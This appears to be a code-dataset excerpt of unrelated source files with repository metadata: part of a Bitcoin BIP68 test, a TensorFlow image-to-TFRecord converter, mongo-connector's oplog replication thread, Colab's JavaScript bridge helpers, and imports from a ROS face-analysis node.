assert_equal(exp.error["message"], NOT_FINAL_ERROR)
else:
assert(False)
# Test mempool-BIP68 consistency after reorg
#
# State of the transactions in the last blocks:
# ... -> [ tx2 ] -> [ tx3 ]
# tip-1 tip
# And currently tx4 is in the mempool.
#
# If we invalidate the tip, tx3 should get added to the mempool, causing
# tx4 to be removed (fails sequence-lock).
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
assert(tx4.hash not in self.nodes[0].getrawmempool())
assert(tx3.hash in self.nodes[0].getrawmempool())
# Now mine 2 empty blocks to reorg out the current tip (labeled tip-1 in
# diagram above).
# This would cause tx2 to be added back to the mempool, which in turn causes
# tx3 to be removed.
tip = int(self.nodes[0].getblockhash(self.nodes[0].getblockcount()-1), 16)
height = self.nodes[0].getblockcount()
for i in range(2):
block = create_block(tip, create_coinbase(height), cur_time)
block.nVersion = 3
block.rehash()
block.solve()
tip = block.sha256
height += 1
self.nodes[0].submitblock(ToHex(block))
cur_time += 1
mempool = self.nodes[0].getrawmempool()
assert(tx3.hash not in mempool)
assert(tx2.hash in mempool)
# Reset the chain and get rid of the mocktimed-blocks
self.nodes[0].setmocktime(0)
self.nodes[0].invalidateblock(self.nodes[0].getblockhash(cur_height+1))
self.nodes[0].generate(10)
# Make sure that BIP68 isn't being used to validate blocks, prior to
# versionbits activation. If more blocks are mined prior to this test
# being run, then it's possible the test has activated the soft fork, and
# this test should be moved to run earlier, or deleted.
def test_bip68_not_consensus(self):
assert(get_bip9_status(self.nodes[0], 'csv')['status'] != 'active')
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 2)
tx1 = FromHex(CTransaction(), self.nodes[0].getrawtransaction(txid))
tx1.rehash()
# Make an anyone-can-spend transaction
tx2 = CTransaction()
tx2.nVersion = 1
tx2.vin = [CTxIn(COutPoint(tx1.sha256, 0), nSequence=0)]
tx2.vout = [CTxOut(int(tx1.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]
# sign tx2
tx2_raw = self.nodes[0].signrawtransaction(ToHex(tx2))["hex"]
tx2 = FromHex(tx2, tx2_raw)
tx2.rehash()
self.nodes[0].sendrawtransaction(ToHex(tx2))
# Now make an invalid spend of tx2 according to BIP68
sequence_value = 100 # 100 block relative locktime
tx3 = CTransaction()
tx3.nVersion = 2
tx3.vin = [CTxIn(COutPoint(tx2.sha256, 0), nSequence=sequence_value)]
tx3.vout = [CTxOut(int(tx2.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]
tx3.rehash()
try:
self.nodes[0].sendrawtransaction(ToHex(tx3))
except JSONRPCException as exp:
assert_equal(exp.error["message"], NOT_FINAL_ERROR)
else:
assert(False)
# make a block that violates bip68; ensure that the tip updates
tip = int(self.nodes[0].getbestblockhash(), 16)
block = create_block(tip, create_coinbase(self.nodes[0].getblockcount()+1))
block.nVersion = 3
block.vtx.extend([tx1, tx2, tx3])
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.nodes[0].submitblock(ToHex(block))
assert_equal(self.nodes[0].getbestblockhash(), block.hash)
def activateCSV(self):
# activation should happen at block height 432 (3 periods)
min_activation_height = 432
height = self.nodes[0].getblockcount()
assert(height < 432)
self.nodes[0].generate(432-height)
assert(get_bip9_status(self.nodes[0], 'csv')['status'] == 'active')
sync_blocks(self.nodes)
# Use self.nodes[1] to test standardness relay policy
def test_version2_relay(self, before_activation):
inputs = [ ]
outputs = { self.nodes[1].getnewaddress() : 1.0 }
rawtx = self.nodes[1].createrawtransaction(inputs, outputs)
rawtxfund = self.nodes[1].fundrawtransaction(rawtx)['hex']
tx = FromHex(CTransaction(), rawtxfund)
tx.nVersion = 2
tx_signed = self.nodes[1].signrawtransaction(ToHex(tx))["hex"]
try:
tx_id = self.nodes[1].sendrawtransaction(tx_signed)
assert(before_activation == False)
except:
assert(before_activation)
if __name__ == '__main__':
BIP68Test().main()
| mit | 9,144,471,322,893,355,000 | 42.011682 | 119 | 0.610571 | false |
velastin/UAndes | convert_to_records.py | 1 | 7327 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Downloads and converts Flowers data to TFRecords of TF-Example protos.
This module downloads the Flowers data, uncompresses it, reads the files
that make up the Flowers data and creates two TFRecord datasets: one for train
and one for test. Each TFRecord dataset is comprised of a set of TF-Example
protocol buffers, each of which contain a single image and label.
The script should take about a minute to run.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import os
import random
import sys
import argparse
import tensorflow as tf
from datasets import dataset_utils
# The number of images in the validation set.
_NUM_VALIDATION = 350
# Seed for repeatability.
_RANDOM_SEED = 0
# The number of shards per dataset split.
_NUM_SHARDS = 5
class ImageReader(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Initializes function that decodes RGB JPEG data.
self._decode_png_data = tf.placeholder(dtype=tf.string)
self._decode_png = tf.image.decode_png(self._decode_png_data, channels=3)
def read_image_dims(self, sess, image_data):
image = self.decode_png(sess, image_data)
return image.shape[0], image.shape[1]
def decode_png(self, sess, image_data):
image = sess.run(self._decode_png,
feed_dict={self._decode_png_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _get_filenames_and_classes(dataset_dir):
"""Returns a list of filenames and inferred class names.
Args:
dataset_dir: A directory containing a set of subdirectories representing
class names. Each subdirectory should contain PNG or JPG encoded images.
Returns:
A list of image file paths, relative to `dataset_dir` and the list of
subdirectories, representing class names.
"""
pedestrian_root = os.path.join(dataset_dir, 'pedestrian_photos')
directories = []
class_names = []
for filename in os.listdir(pedestrian_root):
path = os.path.join(pedestrian_root, filename)
if os.path.isdir(path):
directories.append(path)
class_names.append(filename)
photo_filenames = []
for directory in directories:
for filename in os.listdir(directory):
path = os.path.join(directory, filename)
photo_filenames.append(path)
return photo_filenames, sorted(class_names)
def _get_dataset_filename(dataset_dir, split_name, shard_id):
output_filename = 'pedestrian_%s_%05d-of-%05d.tfrecord' % (
split_name, shard_id, _NUM_SHARDS)
return os.path.join(dataset_dir, output_filename)
def _convert_dataset(split_name, filenames, class_names_to_ids, dataset_dir):
"""Converts the given filenames to a TFRecord dataset.
Args:
split_name: The name of the dataset, either 'train' or 'validation'.
filenames: A list of absolute paths to png or jpg images.
class_names_to_ids: A dictionary from class names (strings) to ids
(integers).
dataset_dir: The directory where the converted datasets are stored.
"""
assert split_name in ['train', 'validation']
num_per_shard = int(math.ceil(len(filenames) / float(_NUM_SHARDS)))
with tf.Graph().as_default():
image_reader = ImageReader()
with tf.Session('') as sess:
for shard_id in range(_NUM_SHARDS):
output_filename = _get_dataset_filename(
dataset_dir, split_name, shard_id)
with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:
start_ndx = shard_id * num_per_shard
end_ndx = min((shard_id+1) * num_per_shard, len(filenames))
for i in range(start_ndx, end_ndx):
sys.stdout.write('\r>> Converting image %d/%d shard %d' % (
i+1, len(filenames), shard_id))
sys.stdout.flush()
# Read the filename:
image_data = tf.gfile.FastGFile(filenames[i], 'rb').read()
height, width = image_reader.read_image_dims(sess, image_data)
class_name = os.path.basename(os.path.dirname(filenames[i]))
class_id = class_names_to_ids[class_name]
example = dataset_utils.image_to_tfexample(
image_data, b'png', height, width, class_id)
tfrecord_writer.write(example.SerializeToString())
sys.stdout.write('\n')
sys.stdout.flush()
def _clean_up_temporary_files(dataset_dir):
"""Removes temporary files used to create the dataset.
Args:
dataset_dir: The directory where the temporary files are stored.
"""
filename = _DATA_URL.split('/')[-1]
filepath = os.path.join(dataset_dir, filename)
tf.gfile.Remove(filepath)
tmp_dir = os.path.join(dataset_dir, 'pedestrian_photos')
tf.gfile.DeleteRecursively(tmp_dir)
def _dataset_exists(dataset_dir):
for split_name in ['train', 'validation']:
for shard_id in range(_NUM_SHARDS):
output_filename = _get_dataset_filename(
dataset_dir, split_name, shard_id)
if not tf.gfile.Exists(output_filename):
return False
return True
def run(dataset_dir):
"""Runs the download and conversion operation.
Args:
dataset_dir: The dataset directory where the dataset is stored.
"""
if not tf.gfile.Exists(dataset_dir):
tf.gfile.MakeDirs(dataset_dir)
if _dataset_exists(dataset_dir):
print('Dataset files already exist. Exiting without re-creating them.')
return
photo_filenames, class_names = _get_filenames_and_classes(dataset_dir)
class_names_to_ids = dict(zip(class_names, range(len(class_names))))
# Divide into train and test:
random.seed(_RANDOM_SEED)
random.shuffle(photo_filenames)
training_filenames = photo_filenames[_NUM_VALIDATION:]
validation_filenames = photo_filenames[:_NUM_VALIDATION]
# First, convert the training and validation sets.
_convert_dataset('train', training_filenames, class_names_to_ids,
dataset_dir)
_convert_dataset('validation', validation_filenames, class_names_to_ids,
dataset_dir)
# Finally, write the labels file:
labels_to_class_names = dict(zip(range(len(class_names)), class_names))
dataset_utils.write_label_file(labels_to_class_names, dataset_dir)
#_clean_up_temporary_files(dataset_dir)
print('\nFinished converting the Flowers dataset!')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='convert dataset to tf records')
parser.add_argument('dataset_dir', help='path to the dataset')
args = parser.parse_args()
run(args.dataset_dir)
| gpl-3.0 | -1,976,234,764,730,661,400 | 29.529167 | 80 | 0.684318 | false |
gwaller/mongo-connector | mongo_connector/oplog_manager.py | 1 | 30523 | # Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tails the oplog of a shard and returns entries
"""
import bson
import logging
try:
import Queue as queue
except ImportError:
import queue
import pymongo
import sys
import time
import threading
import traceback
from mongo_connector import errors, util
from mongo_connector.constants import DEFAULT_BATCH_SIZE
from mongo_connector.util import retry_until_ok
from pymongo import MongoClient
class OplogThread(threading.Thread):
"""OplogThread gathers the updates for a single oplog.
"""
def __init__(self, primary_conn, main_address, oplog_coll, is_sharded,
doc_manager, oplog_progress_dict, namespace_set, auth_key,
auth_username, repl_set=None, collection_dump=True,
batch_size=DEFAULT_BATCH_SIZE, fields=None,
dest_mapping={}, continue_on_error=False):
"""Initialize the oplog thread.
"""
super(OplogThread, self).__init__()
self.batch_size = batch_size
#The connection to the primary for this replicaSet.
self.primary_connection = primary_conn
#Boolean chooses whether to dump the entire collection if no timestamp
# is present in the config file
self.collection_dump = collection_dump
#The mongos for sharded setups
#Otherwise the same as primary_connection.
#The value is set later on.
self.main_connection = None
#The connection to the oplog collection
self.oplog = oplog_coll
#Boolean describing whether the cluster is sharded or not
self.is_sharded = is_sharded
#A document manager for each target system.
#These are the same for all threads.
if type(doc_manager) == list:
self.doc_managers = doc_manager
else:
self.doc_managers = [doc_manager]
#Boolean describing whether or not the thread is running.
self.running = True
#Stores the timestamp of the last oplog entry read.
self.checkpoint = None
#A dictionary that stores OplogThread/timestamp pairs.
#Represents the last checkpoint for a OplogThread.
self.oplog_progress = oplog_progress_dict
#The set of namespaces to process from the mongo cluster.
self.namespace_set = namespace_set
#The dict of source namespaces to destination namespaces
self.dest_mapping = dest_mapping
#Whether the collection dump gracefully handles exceptions
self.continue_on_error = continue_on_error
#If authentication is used, this is an admin password.
self.auth_key = auth_key
#This is the username used for authentication.
self.auth_username = auth_username
# Set of fields to export
self._fields = set(fields) if fields else None
logging.info('OplogThread: Initializing oplog thread')
if is_sharded:
self.main_connection = MongoClient(main_address)
else:
self.main_connection = MongoClient(main_address,
replicaSet=repl_set)
self.oplog = self.main_connection['local']['oplog.rs']
if auth_key is not None:
#Authenticate for the whole system
self.primary_connection['admin'].authenticate(
auth_username, auth_key)
self.main_connection['admin'].authenticate(
auth_username, auth_key)
if not self.oplog.find_one():
err_msg = 'OplogThread: No oplog for thread:'
logging.warning('%s %s' % (err_msg, self.primary_connection))
@property
def fields(self):
return self._fields
@fields.setter
def fields(self, value):
if value:
self._fields = set(value)
# Always include _id field
self._fields.add('_id')
else:
self._fields = None
def run(self):
"""Start the oplog worker.
"""
logging.debug("OplogThread: Run thread started")
while self.running is True:
logging.debug("OplogThread: Getting cursor")
cursor = self.init_cursor()
logging.debug("OplogThread: Got the cursor, go go go!")
# we've fallen too far behind
if cursor is None and self.checkpoint is not None:
err_msg = "OplogThread: Last entry no longer in oplog"
effect = "cannot recover!"
logging.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
continue
#The only entry is the last one we processed
if cursor is None or util.retry_until_ok(cursor.count) == 1:
logging.debug("OplogThread: Last entry is the one we "
"already processed. Up to date. Sleeping.")
time.sleep(1)
continue
last_ts = None
err = False
remove_inc = 0
upsert_inc = 0
update_inc = 0
try:
logging.debug("OplogThread: about to process new oplog "
"entries")
while cursor.alive and self.running:
logging.debug("OplogThread: Cursor is still"
" alive and thread is still running.")
for n, entry in enumerate(cursor):
logging.debug("OplogThread: Iterating through cursor,"
" document number in this cursor is %d"
% n)
# Break out if this thread should stop
if not self.running:
break
# Don't replicate entries resulting from chunk moves
if entry.get("fromMigrate"):
continue
# Take fields out of the oplog entry that
# shouldn't be replicated. This may nullify
# the document if there's nothing to do.
if not self.filter_oplog_entry(entry):
continue
#sync the current oplog operation
operation = entry['op']
ns = entry['ns']
# use namespace mapping if one exists
ns = self.dest_mapping.get(entry['ns'], ns)
for docman in self.doc_managers:
try:
logging.debug("OplogThread: Operation for this "
"entry is %s" % str(operation))
# Remove
if operation == 'd':
entry['_id'] = entry['o']['_id']
entry['ns'] = ns
docman.remove(entry)
remove_inc += 1
# Insert
elif operation == 'i': # Insert
# Retrieve inserted document from
# 'o' field in oplog record
doc = entry.get('o')
# Extract timestamp and namespace
doc['_ts'] = util.bson_ts_to_long(
entry['ts'])
doc['ns'] = ns
docman.upsert(doc)
upsert_inc += 1
# Update
elif operation == 'u':
doc = {"_id": entry['o2']['_id'],
"_ts": util.bson_ts_to_long(
entry['ts']),
"ns": ns}
# 'o' field contains the update spec
docman.update(doc, entry.get('o', {}))
update_inc += 1
except errors.OperationFailed:
logging.exception(
"Unable to process oplog document %r"
% entry)
except errors.ConnectionFailed:
logging.exception(
"Connection failed while processing oplog "
"document %r" % entry)
if (remove_inc + upsert_inc + update_inc) % 1000 == 0:
logging.debug(
"OplogThread: Documents removed: %d, "
"inserted: %d, updated: %d so far" % (
remove_inc, upsert_inc, update_inc))
logging.debug("OplogThread: Doc is processed.")
last_ts = entry['ts']
# update timestamp per batch size
# n % -1 (default for self.batch_size) == 0 for all n
if n % self.batch_size == 1 and last_ts is not None:
self.checkpoint = last_ts
self.update_checkpoint()
# update timestamp after running through oplog
if last_ts is not None:
logging.debug("OplogThread: updating checkpoint after"
"processing new oplog entries")
self.checkpoint = last_ts
self.update_checkpoint()
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError):
logging.exception(
"Cursor closed due to an exception. "
"Will attempt to reconnect.")
err = True
if err is True and self.auth_key is not None:
self.primary_connection['admin'].authenticate(
self.auth_username, self.auth_key)
self.main_connection['admin'].authenticate(
self.auth_username, self.auth_key)
err = False
# update timestamp before attempting to reconnect to MongoDB,
# after being join()'ed, or if the cursor closes
if last_ts is not None:
logging.debug("OplogThread: updating checkpoint after an "
"Exception, cursor closing, or join() on this"
"thread.")
self.checkpoint = last_ts
self.update_checkpoint()
logging.debug("OplogThread: Sleeping. Documents removed: %d, "
"upserted: %d, updated: %d"
% (remove_inc, upsert_inc, update_inc))
time.sleep(2)
def join(self):
"""Stop this thread from managing the oplog.
"""
logging.debug("OplogThread: exiting due to join call.")
self.running = False
threading.Thread.join(self)
def filter_oplog_entry(self, entry):
"""Remove fields from an oplog entry that should not be replicated."""
if not self._fields:
return entry
def pop_excluded_fields(doc):
for key in set(doc) - self._fields:
doc.pop(key)
# 'i' indicates an insert. 'o' field is the doc to be inserted.
if entry['op'] == 'i':
pop_excluded_fields(entry['o'])
# 'u' indicates an update. 'o' field is the update spec.
elif entry['op'] == 'u':
pop_excluded_fields(entry['o'].get("$set", {}))
pop_excluded_fields(entry['o'].get("$unset", {}))
# not allowed to have empty $set/$unset, so remove if empty
if "$set" in entry['o'] and not entry['o']['$set']:
entry['o'].pop("$set")
if "$unset" in entry['o'] and not entry['o']['$unset']:
entry['o'].pop("$unset")
if not entry['o']:
return None
return entry
def get_oplog_cursor(self, timestamp):
"""Move cursor to the proper place in the oplog.
"""
logging.debug("OplogThread: Getting the oplog cursor and moving it "
"to the proper place in the oplog.")
if timestamp is None:
return None
cursor, cursor_len = None, 0
while (True):
try:
logging.debug("OplogThread: Getting the oplog cursor "
"in the while true loop for get_oplog_cursor")
if not self.namespace_set:
cursor = self.oplog.find(
{'ts': {'$gte': timestamp}},
tailable=True, await_data=True
)
else:
cursor = self.oplog.find(
{'ts': {'$gte': timestamp},
'ns': {'$in': self.namespace_set}},
tailable=True, await_data=True
)
# Applying 8 as the mask to the cursor enables OplogReplay
cursor.add_option(8)
logging.debug("OplogThread: Cursor created, getting a count.")
cursor_len = cursor.count()
logging.debug("OplogThread: Count is %d" % cursor_len)
break
except (pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError):
pass
if cursor_len == 0:
logging.debug("OplogThread: Initiating rollback from "
"get_oplog_cursor")
#rollback, we are past the last element in the oplog
timestamp = self.rollback()
logging.info('Finished rollback')
return self.get_oplog_cursor(timestamp)
first_oplog_entry = retry_until_ok(lambda: cursor[0])
cursor_ts_long = util.bson_ts_to_long(first_oplog_entry.get("ts"))
given_ts_long = util.bson_ts_to_long(timestamp)
if cursor_ts_long > given_ts_long:
# first entry in oplog is beyond timestamp, we've fallen behind!
return None
elif cursor_len == 1: # means we are the end of the oplog
self.checkpoint = timestamp
#to commit new TS after rollbacks
return cursor
elif cursor_len > 1:
doc = retry_until_ok(next, cursor)
if timestamp == doc['ts']:
return cursor
else: # error condition
logging.error('OplogThread: %s Bad timestamp in config file'
% self.oplog)
return None
def dump_collection(self):
"""Dumps collection into the target system.
This method is called when we're initializing the cursor and have no
configs i.e. when we're starting for the first time.
"""
dump_set = self.namespace_set or []
logging.debug("OplogThread: Dumping set of collections %s " % dump_set)
#no namespaces specified
if not self.namespace_set:
db_list = retry_until_ok(self.main_connection.database_names)
for database in db_list:
if database == "config" or database == "local":
continue
coll_list = retry_until_ok(
self.main_connection[database].collection_names)
for coll in coll_list:
if coll.startswith("system"):
continue
namespace = "%s.%s" % (database, coll)
dump_set.append(namespace)
timestamp = util.retry_until_ok(self.get_last_oplog_timestamp)
if timestamp is None:
return None
long_ts = util.bson_ts_to_long(timestamp)
def docs_to_dump():
for namespace in dump_set:
logging.info("OplogThread: dumping collection %s"
% namespace)
database, coll = namespace.split('.', 1)
last_id = None
attempts = 0
# Loop to handle possible AutoReconnect
while attempts < 60:
target_coll = self.main_connection[database][coll]
if not last_id:
cursor = util.retry_until_ok(
target_coll.find,
fields=self._fields,
sort=[("_id", pymongo.ASCENDING)]
)
else:
cursor = util.retry_until_ok(
target_coll.find,
{"_id": {"$gt": last_id}},
fields=self._fields,
sort=[("_id", pymongo.ASCENDING)]
)
try:
for doc in cursor:
if not self.running:
raise StopIteration
doc["ns"] = self.dest_mapping.get(
namespace, namespace)
doc["_ts"] = long_ts
last_id = doc["_id"]
yield doc
break
except pymongo.errors.AutoReconnect:
attempts += 1
time.sleep(1)
def upsert_each(dm):
num_inserted = 0
num_failed = 0
for num, doc in enumerate(docs_to_dump()):
if num % 10000 == 0:
logging.debug("Upserted %d docs." % num)
try:
dm.upsert(doc)
num_inserted += 1
except Exception:
if self.continue_on_error:
logging.exception(
"Could not upsert document: %r" % doc)
num_failed += 1
else:
raise
logging.debug("Upserted %d docs" % num_inserted)
if num_failed > 0:
logging.error("Failed to upsert %d docs" % num_failed)
def upsert_all(dm):
try:
dm.bulk_upsert(docs_to_dump())
except Exception as e:
if self.continue_on_error:
logging.exception("OplogThread: caught exception"
" during bulk upsert, re-upserting"
" documents serially")
upsert_each(dm)
else:
raise
def do_dump(dm, error_queue):
try:
# Bulk upsert if possible
if hasattr(dm, "bulk_upsert"):
logging.debug("OplogThread: Using bulk upsert function for "
"collection dump")
upsert_all(dm)
else:
logging.debug(
"OplogThread: DocManager %s has no "
"bulk_upsert method. Upserting documents "
"serially for collection dump." % str(dm))
upsert_each(dm)
except:
# Likely exceptions:
# pymongo.errors.OperationFailure,
# mongo_connector.errors.ConnectionFailed
# mongo_connector.errors.OperationFailed
error_queue.put(sys.exc_info())
# Extra threads (if any) that assist with collection dumps
dumping_threads = []
# Did the dump succeed for all target systems?
dump_success = True
# Holds any exceptions we can't recover from
errors = queue.Queue()
if len(self.doc_managers) == 1:
do_dump(self.doc_managers[0], errors)
else:
# Slight performance gain breaking dump into separate
# threads if > 1 replication target
for dm in self.doc_managers:
t = threading.Thread(target=do_dump, args=(dm, errors))
dumping_threads.append(t)
t.start()
# cleanup
for t in dumping_threads:
t.join()
# Print caught exceptions
try:
while True:
klass, value, trace = errors.get_nowait()
dump_success = False
traceback.print_exception(klass, value, trace)
except queue.Empty:
pass
if not dump_success:
err_msg = "OplogThread: Failed during dump collection"
effect = "cannot recover!"
logging.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
return None
return timestamp
def get_last_oplog_timestamp(self):
"""Return the timestamp of the latest entry in the oplog.
"""
if not self.namespace_set:
curr = self.oplog.find().sort(
'$natural', pymongo.DESCENDING
).limit(1)
else:
curr = self.oplog.find(
{'ns': {'$in': self.namespace_set}}
).sort('$natural', pymongo.DESCENDING).limit(1)
if curr.count(with_limit_and_skip=True) == 0:
return None
logging.debug("OplogThread: Last oplog entry has timestamp %d."
% curr[0]['ts'].time)
return curr[0]['ts']
def init_cursor(self):
"""Position the cursor appropriately.
The cursor is set to either the beginning of the oplog, or
wherever it was last left off.
"""
logging.debug("OplogThread: Initializing the oplog cursor.")
timestamp = self.read_last_checkpoint()
if timestamp is None and self.collection_dump:
timestamp = self.dump_collection()
if timestamp:
msg = "Dumped collection into target system"
logging.info('OplogThread: %s %s'
% (self.oplog, msg))
elif timestamp is None:
# set timestamp to top of oplog
timestamp = retry_until_ok(self.get_last_oplog_timestamp)
self.checkpoint = timestamp
cursor = self.get_oplog_cursor(timestamp)
if cursor is not None:
self.update_checkpoint()
return cursor
def update_checkpoint(self):
"""Store the current checkpoint in the oplog progress dictionary.
"""
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
oplog_dict[str(self.oplog)] = self.checkpoint
logging.debug("OplogThread: oplog checkpoint updated to %s" %
str(self.checkpoint))
def read_last_checkpoint(self):
"""Read the last checkpoint from the oplog progress dictionary.
"""
oplog_str = str(self.oplog)
ret_val = None
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
if oplog_str in oplog_dict.keys():
ret_val = oplog_dict[oplog_str]
logging.debug("OplogThread: reading last checkpoint as %s " %
str(ret_val))
return ret_val
def rollback(self):
"""Rollback target system to consistent state.
The strategy is to find the latest timestamp in the target system and
the largest timestamp in the oplog less than the latest target system
timestamp. This defines the rollback window and we just roll these
back until the oplog and target system are in consistent states.
"""
# Find the most recently inserted document in each target system
logging.debug("OplogThread: Initiating rollback sequence to bring "
"system into a consistent state.")
last_docs = []
for dm in self.doc_managers:
dm.commit()
last_docs.append(dm.get_last_doc())
# Of these documents, which is the most recent?
last_inserted_doc = max(last_docs,
key=lambda x: x["_ts"] if x else float("-inf"))
# Nothing has been replicated. No need to rollback target systems
if last_inserted_doc is None:
return None
# Find the oplog entry that touched the most recent document.
# We'll use this to figure where to pick up the oplog later.
target_ts = util.long_to_bson_ts(last_inserted_doc['_ts'])
last_oplog_entry = util.retry_until_ok(
self.oplog.find_one,
{'ts': {'$lte': target_ts}},
sort=[('$natural', pymongo.DESCENDING)]
)
logging.debug("OplogThread: last oplog entry is %s"
% str(last_oplog_entry))
# The oplog entry for the most recent document doesn't exist anymore.
# If we've fallen behind in the oplog, this will be caught later
if last_oplog_entry is None:
return None
# rollback_cutoff_ts happened *before* the rollback
rollback_cutoff_ts = last_oplog_entry['ts']
start_ts = util.bson_ts_to_long(rollback_cutoff_ts)
# timestamp of the most recent document on any target system
end_ts = last_inserted_doc['_ts']
for dm in self.doc_managers:
rollback_set = {} # this is a dictionary of ns:list of docs
# group potentially conflicted documents by namespace
for doc in dm.search(start_ts, end_ts):
if doc['ns'] in rollback_set:
rollback_set[doc['ns']].append(doc)
else:
rollback_set[doc['ns']] = [doc]
# retrieve these documents from MongoDB, either updating
# or removing them in each target system
for namespace, doc_list in rollback_set.items():
# Get the original namespace
original_namespace = namespace
for source_name, dest_name in self.dest_mapping.items():
if dest_name == namespace:
original_namespace = source_name
database, coll = original_namespace.split('.', 1)
obj_id = bson.objectid.ObjectId
bson_obj_id_list = [obj_id(doc['_id']) for doc in doc_list]
to_update = util.retry_until_ok(
self.main_connection[database][coll].find,
{'_id': {'$in': bson_obj_id_list}},
fields=self._fields
)
#doc list are docs in target system, to_update are
#docs in mongo
doc_hash = {} # hash by _id
for doc in doc_list:
doc_hash[bson.objectid.ObjectId(doc['_id'])] = doc
to_index = []
def collect_existing_docs():
for doc in to_update:
if doc['_id'] in doc_hash:
del doc_hash[doc['_id']]
to_index.append(doc)
retry_until_ok(collect_existing_docs)
#delete the inconsistent documents
logging.debug("OplogThread: Rollback, removing inconsistent "
"docs.")
remov_inc = 0
for doc in doc_hash.values():
try:
dm.remove(doc)
remov_inc += 1
logging.debug("OplogThread: Rollback, removed %s " %
str(doc))
except errors.OperationFailed:
logging.warning(
"Could not delete document during rollback: %s "
"This can happen if this document was already "
"removed by another rollback happening at the "
"same time." % str(doc)
)
logging.debug("OplogThread: Rollback, removed %d docs." %
remov_inc)
#insert the ones from mongo
logging.debug("OplogThread: Rollback, inserting documents "
"from mongo.")
insert_inc = 0
fail_insert_inc = 0
for doc in to_index:
doc['_ts'] = util.bson_ts_to_long(rollback_cutoff_ts)
doc['ns'] = self.dest_mapping.get(namespace, namespace)
try:
insert_inc += 1
dm.upsert(doc)
except errors.OperationFailed as e:
fail_insert_inc += 1
logging.error("OplogThread: Rollback, Unable to "
"insert %s with exception %s"
% (doc, str(e)))
logging.debug("OplogThread: Rollback, Successfully inserted %d "
" documents and failed to insert %d"
" documents. Returning a rollback cutoff time of %s "
% (insert_inc, fail_insert_inc, str(rollback_cutoff_ts)))
return rollback_cutoff_ts
| apache-2.0 | 1,205,969,537,052,731,600 | 39.97047 | 80 | 0.496445 | false |
googlecolab/colabtools | google/colab/output/_js.py | 1 | 3073 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Colab helpers for interacting with JavaScript in outputframes."""
import json
from google.colab import _ipython
from google.colab import _message
_json_decoder = json.JSONDecoder()
def eval_js(script, ignore_result=False, timeout_sec=None):
"""Evaluates the Javascript within the context of the current cell.
Args:
script: The javascript string to be evaluated
ignore_result: If true, will return immediately
and result from javascript side will be ignored.
timeout_sec: blocks for that many seconds.
Returns:
Result of the Javascript evaluation or None if ignore_result.
"""
args = ['cell_javascript_eval', {'script': script}]
kernel = _ipython.get_kernel()
request_id = _message.send_request(*args, parent=kernel.shell.parent_header)
if ignore_result:
return
return _message.read_reply_from_input(request_id, timeout_sec)
_functions = {}
def register_callback(function_name, callback):
"""Registers a function as a target invokable by Javacript in outputs.
This exposes the Python function as a target which may be invoked by
Javascript executing in Colab output frames.
This callback can be called from javascript side using:
colab.kernel.invokeFunction(function_name, [1, 2, 3], {'hi':'bye'})
then it will invoke callback(1, 2, 3, hi="bye")
Args:
function_name: string
callback: function that possibly takes positional and keyword arguments
that will be passed via invokeFunction()
"""
_functions[function_name] = callback
def _invoke_function(function_name, json_args, json_kwargs):
"""Invokes callback with given function_name.
This function is meant to be used by frontend when proxying
data from secure iframe into kernel. For example:
_invoke_function(fn_name, "'''" + JSON.stringify(data) + "'''")
Note the triple quotes: valid JSON cannot contain triple quotes,
so this is a valid literal.
Args:
function_name: string
json_args: string containing valid json, provided by user.
json_kwargs: string containing valid json, provided by user.
Returns:
The value returned by the callback.
Raises:
ValueError: if the registered function cannot be found.
"""
args = _json_decoder.decode(json_args)
kwargs = _json_decoder.decode(json_kwargs)
callback = _functions.get(function_name, None)
if not callback:
raise ValueError('Function not found: {function_name}'.format(
function_name=function_name))
return callback(*args, **kwargs)
| apache-2.0 | 8,002,486,483,341,580,000 | 31.691489 | 78 | 0.731207 | false |
amasiero/approach_control | approach_control_people/nodes/approach_control_people/faces/GenderDiscover.py | 1 | 2283 | #!/usr/bin/env python
import cv2.cv
import imutils
import time
import smach
import smach_ros
import rospy
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from approach_control_people.faces.Map import Map
from approach_control_people.faces.ULBP import ULBP
from approach_control_people.faces.lbp_utils import W, Authentify
